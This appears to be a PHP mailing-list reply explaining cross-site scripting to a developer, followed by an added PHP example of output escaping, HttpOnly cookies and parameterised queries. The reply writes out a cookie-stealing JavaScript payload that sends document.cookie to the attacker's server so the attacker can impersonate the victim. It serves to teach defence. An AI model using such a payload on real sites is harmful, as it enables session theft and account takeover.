> > Or steal it. :)
> >
> > I hope you have checked your site for any cross-site scripting
> > vulnerabilities. This is exactly where vulnerabilities like this
> > into play...
> Interesting -- I'm only a few days away from launching this... could
> elaborate on the potential risk, or point me to some documentation?

Just search google for Cross Site Scripting and you'll find a ton of
articles about that specifically. It all comes down to validating user
input and not displaying it directly back to the screen. 

Here is a link, for example, that'll pop up your cookies for cnn.com.
(watch the wrapping!)


Now, how about instead of just executing alert("Hi"), I do a
location.href='www.myserver.com?var='+document.cookie; and send myself
your cookie. Then I just simply make my cookie match yours, and poof,
I'm you. :)

It all comes down to validating user input and never showing it directly
back to the browser/screen. 

Similar problems exist for variables you use in database queries...

---John Holmes...

PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
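An added example, not from the thread or from any poster, that shows the advice above in PHP: the raw echo beside its escaped form, a session cookie the browser will not expose through document.cookie, and the bound-parameter version of the database point. It assumes PHP 7.3+ (array form of session_set_cookie_params), the pdo_sqlite extension, and a hypothetical `users` table.

```php
<?php
// Added example (not from the thread): echoing user input straight back
// versus escaping it, plus cookie and query hardening for the same input.

// Harden the session cookie before the session starts. An HttpOnly cookie
// is not readable from document.cookie, so a script injected into the page
// cannot read it; 'secure' assumes the site is served over HTTPS.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

// Constructed input standing in for a query-string parameter such as ?name=
// When run from the CLI, $_GET is empty and the constructed default is used.
$input = $_GET['name'] ?? '<script>alert("Hi")</script>';

// Vulnerable form (kept as a comment): the input is written into the page
// unchanged and the browser executes whatever markup it contains.
// echo "Hello, " . $input;

// Safe form: every HTML metacharacter becomes an entity before output, so
// the browser displays the text instead of interpreting it.
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
echo "Hello, " . escapeHtml($input) . "\n";

// The same rule for database queries: never splice input into SQL text;
// bind it as a parameter so the driver sends it as data, not as SQL.
// Assumption: an in-memory SQLite database with a hypothetical `users` table.
$pdo = new PDO('sqlite::memory:');
$pdo->exec('CREATE TABLE users (name TEXT)');
$stmt = $pdo->prepare('SELECT name FROM users WHERE name = :name');
$stmt->execute([':name' => $input]);
```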